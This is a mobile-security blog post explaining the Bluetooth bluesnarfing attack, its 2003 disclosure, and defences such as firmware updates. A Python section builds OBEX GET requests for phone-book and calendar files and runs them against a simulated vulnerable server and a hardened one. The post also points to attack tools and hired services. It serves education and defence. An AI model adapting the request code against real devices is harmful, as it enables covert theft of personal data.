What is Bluesnarfing?

Finjan Mobile Blog, Mobile Security


Once touted as possibly the greatest thing since sliced bread, wireless Bluetooth technology has since gained a reputation as one of the gaping holes in mobile and wireless device security, almost as bad as public WiFi.

While it would be harsh to flatly dismiss a wireless technology that lets the visually or mobility-impaired use internet and computer systems, or remotely control motor-driven appliances and machinery, Bluetooth does raise concerns, particularly because of its exposure to several kinds of attack. One of these is known as bluesnarfing.

Bluesnarfing

Bluetooth is a short-range wireless standard for exchanging data between desktop and mobile computers, smartphones, tablets, PDAs (Personal Digital Assistants), and other devices which support the technology.

Bluesnarfing (or a BlueSnarf attack) is a device hack which is easiest to perform when a Bluetooth-capable device is set to “discoverable” mode, meaning its Bluetooth function is turned on and the device can be located by other compatible devices within range. Note that discoverable mode only controls whether the device answers inquiry scans; an attacker who already knows, or has brute-forced, the device’s 48-bit Bluetooth address can still attempt to connect to a device that is switched on but set to non-discoverable.

It involves the theft of data from a wireless device having a Bluetooth connection – which could include information from contact lists, calendars, emails, or text messages. This theft typically occurs without the user’s knowledge, and so may go on indefinitely unless discovered.

A Shocking Discovery

Bluesnarfing first came to light in September 2003, when it was observed by researcher Marcel Holtmann. Adam Laurie of A.L. Digital independently found the same vulnerability in November 2003 while testing the security of Bluetooth-compatible devices.

Laurie’s vulnerability disclosure to the Bugtraq mailing list in November 2003, an attempt to make device manufacturers aware of the problem, was the first occasion on which bluesnarfing became more generally known.

Object Exchange Dynamics

To stage a BlueSnarf attack, an attacker exploits implementation flaws in some devices’ handling of the Object Exchange (OBEX) protocol, which is widely used to transfer objects between wireless devices. The attacker connects to the Object Push Profile (OPP), a service which by design does not require authentication, because it exists for the easy exchange of digital business cards and other small objects that the receiving user can accept or reject.

The attacker then issues an OBEX GET request against the OBEX Push target for known filenames. These filenames are specified under the IrMC Specification (a standard for synchronising data between devices), and include the likes of “telecom/cal.vcs” (for the device calendar) and “telecom/pb.vcf” (for the device phone book). An OPP server is only meant to accept objects pushed to it (PUT) and, at most, hand out the owner’s own business card; a vulnerable one honours the Name header on a GET and returns whatever object it names.

No pairing takes place at any point: the whole attack rides on the unauthenticated OPP channel, which is why the victim is never prompted. If the firmware on a device is unsecured or improperly implemented, an attacker may be able to read and steal every file whose name is either known or guessed correctly. On some handsets the same class of flaw extended to other services available to the targeted user.
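The exchange described above, as an added example that is not part of the original post and not taken from any real handset firmware or attack tool. It encodes OBEX packets by hand (opcode, big-endian length, then headers; the Name header is null-terminated UTF-16BE, the Type and End-of-Body headers are byte sequences), drives a CONNECT followed by a GET for the IrMC names, and runs the request against two toy in-memory OPP servers: a vulnerable one that serves whatever the Name header asks for, and a hardened one that refuses any GET carrying a Name and only hands out the owner’s own business card. The phone book, calendar and owner card contents are constructed sample data; the server functions, `obex_get` and `pull` are hypothetical helpers, not a library API.

```python
import struct

# OBEX opcodes (the final bit 0x80 is set on the wire) and response codes.
OP_CONNECT, OP_GET = 0x00, 0x03
RSP_SUCCESS, RSP_FORBIDDEN, RSP_NOT_FOUND = 0xA0, 0xC3, 0xC4
# Header identifiers: the top two bits of the HI byte select the value encoding.
HDR_NAME, HDR_TYPE, HDR_END_OF_BODY = 0x01, 0x42, 0x49

# Constructed sample objects standing in for the handset's IrMC object store.
PHONE_STORE = {
    "telecom/pb.vcf": b"BEGIN:VCARD\r\nVERSION:2.1\r\nN:Doe;Jane\r\nTEL:+15550100\r\nEND:VCARD\r\n",
    "telecom/cal.vcs": b"BEGIN:VCALENDAR\r\nVERSION:1.0\r\nEND:VCALENDAR\r\n",
}
OWNER_CARD = b"BEGIN:VCARD\r\nVERSION:2.1\r\nN:Owner;Phone\r\nEND:VCARD\r\n"


def encode_header(hi, value):
    kind = hi & 0xC0
    if kind == 0x00:                        # null-terminated UTF-16BE string, length includes HI+len
        data = value.encode("utf-16-be") + b"\x00\x00"
        return struct.pack(">BH", hi, 3 + len(data)) + data
    if kind == 0x40:                        # byte sequence, length includes HI+len
        return struct.pack(">BH", hi, 3 + len(value)) + value
    if kind == 0x80:                        # single byte value
        return struct.pack(">BB", hi, value)
    return struct.pack(">BI", hi, value)    # four byte value


def encode_packet(opcode, fields=b"", headers=()):
    body = fields + b"".join(encode_header(hi, v) for hi, v in headers)
    return struct.pack(">BH", opcode | 0x80, 3 + len(body)) + body


def decode_headers(data):
    headers, i = [], 0
    while i < len(data):
        hi, kind = data[i], data[i] & 0xC0
        if kind in (0x00, 0x40):
            (length,) = struct.unpack(">H", data[i + 1:i + 3])
            raw = data[i + 3:i + length]
            value = raw[:-2].decode("utf-16-be") if kind == 0x00 else raw
            i += length
        elif kind == 0x80:
            value, i = data[i + 1], i + 2
        else:
            (value,) = struct.unpack(">I", data[i + 1:i + 5])
            i += 5
        headers.append((hi, value))
    return headers


def connect_request(max_packet=0x2000):
    # CONNECT carries version 1.0, flags, and our maximum packet size before any headers.
    return encode_packet(OP_CONNECT, struct.pack(">BBH", 0x10, 0x00, max_packet))


def obex_get(path, mime="text/x-vCard"):
    # path=None is the legitimate "business card pull": a GET with Type only, no Name.
    headers = [(HDR_TYPE, mime.encode("ascii") + b"\x00")]
    if path is not None:
        headers.insert(0, (HDR_NAME, path))
    return encode_packet(OP_GET, headers=headers)


def vulnerable_opp_server(request):
    # Flaw: trusts the Name header on GET and serves any object it can find.
    op = request[0] & 0x7F
    if op == OP_CONNECT:
        return encode_packet(RSP_SUCCESS, request[3:7])     # echo version/flags/max packet
    if op == OP_GET:
        name = dict(decode_headers(request[3:])).get(HDR_NAME)
        if name in PHONE_STORE:
            return encode_packet(RSP_SUCCESS, headers=[(HDR_END_OF_BODY, PHONE_STORE[name])])
        return encode_packet(RSP_NOT_FOUND)
    return encode_packet(RSP_FORBIDDEN)


def hardened_opp_server(request):
    # Fix: a GET may only fetch the owner's default vCard; any Name header is refused outright.
    op = request[0] & 0x7F
    if op == OP_CONNECT:
        return encode_packet(RSP_SUCCESS, request[3:7])
    if op == OP_GET:
        hdrs = dict(decode_headers(request[3:]))
        if HDR_NAME in hdrs or hdrs.get(HDR_TYPE) != b"text/x-vCard\x00":
            return encode_packet(RSP_FORBIDDEN)
        return encode_packet(RSP_SUCCESS, headers=[(HDR_END_OF_BODY, OWNER_CARD)])
    return encode_packet(RSP_FORBIDDEN)


def pull(server, path, mime="text/x-vCard"):
    """Client side of one snarf attempt: CONNECT, then GET; returns (response code, object or None)."""
    if server(connect_request())[0] != RSP_SUCCESS:
        return None, None
    resp = server(obex_get(path, mime))
    return resp[0], dict(decode_headers(resp[3:])).get(HDR_END_OF_BODY)


if __name__ == "__main__":
    for srv in (vulnerable_opp_server, hardened_opp_server):
        for path in ("telecom/pb.vcf", "telecom/cal.vcs", None):
            code, obj = pull(srv, path)
            print(f"{srv.__name__:22} GET {str(path):16} -> 0x{code:02X} {obj!r}")
```

Against the vulnerable server the two IrMC names come back with status 0xA0 (Success) and the full object; against the hardened server the same requests get 0xC3 (Forbidden) while the Name-less business card pull still works, which is the only GET an OPP server should ever answer.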

Bluesnarfing to Order

As with so much of the economy of the “Dark Web”, bluesnarfing tools and bespoke services are readily available – if you know where to look.

These resources are accessible to both “black hat” and “white hat” hackers, and the first tool out of the BlueSnarf attacker’s bag of tricks is typically a utility like Bluediving, a Bluetooth penetration testing suite that probes nearby devices for OBEX implementation flaws.

Once a device has been identified as being susceptible to BlueSnarf attacks, the hacker then has a few options:

If they have some programming skills, they can code and compile a complete bluesnarfing attack tool of their own.

They can avail themselves of the code snippets and resources available on a site like BlueJackingTools.com, and customize an attack weapon of their choice.

They can contact an independent bluesnarfing “contractor”, and hire their services or purchase a BlueSnarf attack package from them.

Counter-Measures

What makes bluesnarfing such a concern is that while an attack is under way the victim can be completely unaware of what’s going on as their high-value data leaks away into cyber-criminal hands. The underlying defect is a firmware bug rather than a flaw in the Bluetooth standard itself, so a device whose OBEX implementation has not been fixed stays exposed, and short of disabling Bluetooth on your devices altogether there’s no foolproof way of preventing a BlueSnarf attack.

That said, there are some measures you can take to protect yourself:

On many devices, discoverable mode is switched on by default. Keeping your phone or other mobile device in non-discoverable (“invisible”) mode affords some protection against BlueSnarf attacks, because an attacker first has to find your device’s address, but it does not fix a vulnerable OBEX implementation, and a device that is switched on can still be reached by anyone who already knows the address.

Install the firmware and operating system updates your manufacturer provides. Because bluesnarfing relies on an implementation flaw, the real fix for an affected handset is a corrected firmware that refuses GET requests for named objects over the Object Push Profile.

There are anti-bluesnarfing tools available, typically simple utilities that can be configured to alert you to any unauthorized Bluetooth connection between your device and those of others nearby. As with the attack tools, these defensive utilities can be found on bluesnarfing resource websites.
